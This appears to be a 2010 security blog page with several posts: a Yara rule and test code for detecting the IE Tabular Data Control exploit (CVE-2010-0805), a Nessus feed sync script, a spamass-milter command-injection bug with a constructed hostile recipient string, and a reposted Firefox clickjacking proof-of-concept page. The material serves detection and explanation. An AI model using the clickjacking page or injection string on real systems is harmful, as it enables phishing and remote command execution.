Posted: April 6th, 2010 | Author: xanda | Filed under: IT Related | Tags: ActiveX, CVE-2010-0805, detection, internet explorer, jsunpack, Tabular Data Control, yara | 9 Comments »
The Internet Explorer Tabular Data Control ActiveX memory corruption bug (CVE-2010-0805) has been ported to Metasploit, so I decided to release my detection rule for Yara. It keys on the control's CLSID, the DataURL parameter name and a double-quoted http:// value; the condition fires on CLSID plus URL value, or on all three together.
rule MSIETabularActivex
{
meta:
ref = "CVE-2010-0805"
impact = 7
hide = true
strings:
$cve20100805_1 = "333C7BC4-460F-11D0-BC04-0080C7055A83" nocase fullword
$cve20100805_2 = "DataURL" nocase fullword
$cve20100805_3 = /value\=\"http:\/\/(.*?)\"/ nocase fullword
condition:
($cve20100805_1 and $cve20100805_3) or (all of them)
}
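To sanity-check the rule before dropping it into a scanner, here is an added Python re-implementation of its three strings and its condition, run over two constructed HTML samples. It is example code for this page, not part of the original post and not Yara itself; the `<object classid="clsid:...">` markup and the example.invalid host are assumptions. Besides confirming a hit on the expected shape of page, it shows the caveat a practitioner should know: $cve20100805_3 only matches a double-quoted http:// value, so a single-quoted (or https://) DataURL does not trigger the rule.

```python
import re

# Added example (not part of the original post or of Yara): a plain Python
# re-implementation of the MSIETabularActivex rule's strings and condition, so
# the rule logic can be exercised without yara-python. Samples are constructed.

CLSID = "333C7BC4-460F-11D0-BC04-0080C7055A83"

# Same patterns as $cve20100805_1..3 in the rule; all three are `nocase`.
STRINGS = {
    "cve20100805_1": re.escape(CLSID),
    "cve20100805_2": re.escape("DataURL"),
    "cve20100805_3": r'value="http://(.*?)"',
}


def _is_alnum(ch: str) -> bool:
    # Yara works on bytes, so only ASCII letters and digits count.
    return ch.isascii() and ch.isalnum()


def _fullword_search(pattern: str, data: str) -> bool:
    """Yara `fullword`: the match may not be immediately preceded or followed
    by an alphanumeric byte. A plain \\b would not do for $cve20100805_3,
    whose match ends with a quote rather than a word character."""
    for m in re.finditer(pattern, data, re.IGNORECASE):
        before = data[m.start() - 1] if m.start() > 0 else ""
        after = data[m.end()] if m.end() < len(data) else ""
        if not _is_alnum(before) and not _is_alnum(after):
            return True
    return False


def match_msie_tabular_activex(data: str) -> bool:
    """Condition: ($cve20100805_1 and $cve20100805_3) or (all of them)."""
    hit = {name: _fullword_search(pat, data) for name, pat in STRINGS.items()}
    return (hit["cve20100805_1"] and hit["cve20100805_3"]) or all(hit.values())


# Constructed sample shaped like a page that instantiates the Tabular Data
# Control and points DataURL at an attacker-chosen host (example.invalid is
# an assumption, not taken from any real sample).
SAMPLE_HIT = """<html><body>
<object id="tdc" classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
  <param name="DataURL" value="http://example.invalid/data.txt">
</object>
</body></html>"""

# Same page with a single-quoted value: $cve20100805_3 only matches a
# double-quoted http:// value, so this variant slips past the rule.
SAMPLE_SINGLE_QUOTED = SAMPLE_HIT.replace(
    'value="http://example.invalid/data.txt"',
    "value='http://example.invalid/data.txt'")


if __name__ == "__main__":
    for label, sample in (("double-quoted", SAMPLE_HIT),
                          ("single-quoted", SAMPLE_SINGLE_QUOTED)):
        verdict = "MATCH" if match_msie_tabular_activex(sample) else "no match"
        print(f"{label}: {verdict}")
```

Against the real rule the equivalent check is `yara -s MSIETabularActivex.yar sample.html`, where `-s` prints the strings that matched so you can see which of the two branches of the condition fired.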
Credit:
- ZSploit.com
- Metasploit
- @d3t0n4t0r
Posted: March 21st, 2010 | Author: xanda | Filed under: IT Related | Tags: alienvault, macos, nessus, nvt, openvast, snow leopard | 6 Comments »
Here is my simple howto and modified AlienVault NVT sync script to be used with Nessus 4 on Mac OS.
First things first: you need to have Nessus and MacPorts installed.
Then install the md5sha1sum package (it provides the md5sum binary the script looks for):
sudo port install md5sha1sum
Use the following modified script and let it automagically fetch the NVT feed for you
#!/bin/bash
#
# OpenVAS
# Description: Synchronize with NVT feed.
# This shell script synchronizes the local set of
# OpenVAS Network Vulnerability Tests (NVTs) and
# associated includefiles with a given upstream
# feed of updated or new files.
#
# Authors:
# Lukas Grunwald <l.grunwald@dn-systems.de>
# Jan-Oliver Wagner <jan-oliver.wagner@intevation.de>
# xanda <adnanDOTshukorATgmailDOTcom>
#
# Copyright DN-Systems Enterprise Internet Solutions GmbH 2007
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Slight modifications, 2008/07 AlienVault VRT - code@alienvault.com
# Slight modifications, 2008/08 Vlatko Kosturjak Kost <kostATlinuxDOThr>
# Slight modifications, 2010/03 xanda - adnanDOTshukorATgmailDOTcom

SCANNER=$1
# Only "nessus" is supported by this modified version
if [ "$SCANNER" != "nessus" ]
then
  echo "Usage: $0 nessus"
  exit 1
fi

# Plugin dir (override it by exporting NVT_DIR before running the script)
if [ -z "$NVT_DIR" ]; then
  NVT_DIR="/Library/Nessus/run/lib/nessus/plugins"
fi

# The URL of the plugin feed.
# NOTE: plain rsync:// is neither encrypted nor authenticated, and the
# plugins fetched here are executed by nessusd, so only point this at a
# feed host you trust.
FEED=rsync://feed.alienvault.com:/nvt-feed

# Locate a command in the usual Mac OS / MacPorts / Fink directories
findcmd()
{
  CMD=$1
  SRCH=/usr/bin:/usr/ucb:/usr/sbin:/sw/bin:/sbin:/usr/local/bin:/usr/local/sbin:/opt/local/bin:/opt/local/sbin
  SAVEIFS=$IFS
  IFS=:
  set $SRCH
  IFS=$SAVEIFS
  for dir
  do
    [ -x "$dir/$CMD" ] && {
      echo "$dir/$CMD"
      return
    }
  done
}

chk_system_tools(){
  echo "Searching for required system tools ..."
  RSYNC=`findcmd rsync`
  # md5sum (from the md5sha1sum port) is located for parity with the
  # upstream script; this modified version does not verify checksums with it.
  MD5SUM=`findcmd md5sum`
  if [ -z "$RSYNC" ]; then
    echo "Error: RSYNC not found"
    exit 1
  fi
  if [ -z "$MD5SUM" ]; then
    echo "Error: MD5SUM not found"
    exit 1
  fi
}

sync_nvts (){
  echo "Synchronizing NVTs via RSYNC ..."
  mkdir -p "$NVT_DIR"
  # No eval here: NVT_DIR comes from the environment and this script runs
  # under sudo, so its value must never be re-parsed by the shell.
  "$RSYNC" -av --progress "$FEED" "$NVT_DIR" || {
    echo "Error: rsync failed, the plugin directory may be incomplete"
    exit 1
  }
  echo "Synchronization successful."
}

echo "AlienVault NVT Feed Sync"
echo " "
echo "Configured Scanner: $SCANNER"
echo "Configured NVT Feed: $FEED"
echo "Synchronized into: $NVT_DIR"
echo " "
echo " "
chk_system_tools
sync_nvts
echo " "
echo " "
echo "Please restart your scanner daemon"
chmod +x alienvault-nvt-feed.sh
Make sure you stop the Nessus server before running the script!
sudo ./alienvault-nvt-feed.sh nessus
Enjoy! 😉
Posted: March 11th, 2010 | Author: xanda | Filed under: IT Related | Tags: securityfocus, Symantec | 1 Comment »
Beginning March 15, 2010 SecurityFocus will begin a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com. There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.
Read more HERE
Posted: March 9th, 2010 | Author: xanda | Filed under: IT Related | Tags: Bugtraq ID 38578, exploit, remote, SpamAssassin | No Comments »
Can you spot the security bug? 🙂
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do addressexpansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r");
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);
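For the record, the bug is in the `snprintf`/`popen` pair: `envrcpt[0]`, the envelope recipient chosen by the remote SMTP client, is pasted into a shell command line wrapped in nothing more than double quotes, so a recipient containing a quote closes the argument and the rest of the string is run by the shell. The Python below is an added example for this page, not code from spamass-milter: it reproduces the milter's command-string construction beside an argv-based call that never touches a shell. `echo` stands in for SENDMAIL so it runs harmlessly anywhere with /bin/sh, and `HOSTILE_RCPT` is a constructed input.

```python
from __future__ import annotations

import subprocess

# Added example, not code from spamass-milter: reproduces how mlfi_envrcpt()
# assembles its popen() command line from the envelope recipient and
# contrasts it with an argv-based call. "echo" stands in for SENDMAIL so the
# commands are harmless; HOSTILE_RCPT is constructed, not captured traffic.


def build_popen_command(rcpt: str, sendmail: str = "echo") -> str:
    """Same format string as the milter: '%s -bv "%s" 2>&1'.
    The recipient is only wrapped in double quotes, so a quote inside it
    closes the argument and whatever follows is parsed by the shell as
    further commands, running with the milter's privileges."""
    return '%s -bv "%s" 2>&1' % (sendmail, rcpt)


def run_vulnerable(rcpt: str, sendmail: str = "echo") -> list[str]:
    """popen() semantics: the whole string goes through /bin/sh -c."""
    proc = subprocess.run(build_popen_command(rcpt, sendmail), shell=True,
                          stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                          text=True)
    return proc.stdout.splitlines()


def run_hardened(rcpt: str, sendmail: str = "echo") -> list[str]:
    """Hardened form: no shell at all, the recipient is a single argv
    element whatever characters it contains. A leading '-' is rejected so
    the address cannot be taken by sendmail as an option either. stderr is
    merged into stdout to keep the '2>&1' behaviour of the original."""
    if rcpt.startswith("-"):
        raise ValueError("recipient must not start with '-'")
    proc = subprocess.run([sendmail, "-bv", rcpt],
                          stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                          text=True)
    return proc.stdout.splitlines()


def shell_safe(rcpt: str) -> bool:
    """Characters that stay special inside sh double quotes. If the string
    construction has to remain, this is the minimum an allow-list must
    reject before the recipient reaches popen()."""
    return not any(c in rcpt for c in '"$`\\')


# Constructed recipient: closes the quoted argument, runs its own command,
# then reopens a quote so the remainder of the template still parses.
HOSTILE_RCPT = 'victim@example.com"; echo injected; echo "'

if __name__ == "__main__":
    print("command string:", build_popen_command(HOSTILE_RCPT))
    print("via popen/sh  :", run_vulnerable(HOSTILE_RCPT))
    print("via argv      :", run_hardened(HOSTILE_RCPT))
```

With the hostile recipient the popen-style call yields three output lines, the middle one being the injected command's output, while the argv-style call yields a single line containing the whole recipient verbatim.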
Posted: February 26th, 2010 | Author: xanda | Filed under: IT Related | Tags: clickjacking, firefox, full disclosure, mozilla | 2 Comments »
I was about to shut down my machine and go to sleep, but suddenly my RSS reader started popping up new feeds.
Here is one that made me smile:
Mozilla firefox 3.6 unpatched phishing vulnerability
From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300
…Unpatched bug since Mozilla firefox 3.0…
Mozilla “INsecurity team” remember, security through obscurity just
DOESN’T WORK…
Locking down bugzilla advisories even the 2 years old ones is
unnecessary and lame.
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://Maliciouswebsite';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<br>
<a href="http://trustedwebsite" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://trustedwebsite</font></a><br>
</body>
</html>
For example:
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.wikipedia.org';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a><br>
</body>
</html>
Source: www.exploit-db.com
Phishing, huh? To me it's clickjacking 🙂
Source: http://seclists.org/fulldisclosure/2010/Feb/434
P/S: Owh ya, NoScript is one of my best friends and he wants to be your best friend too 😉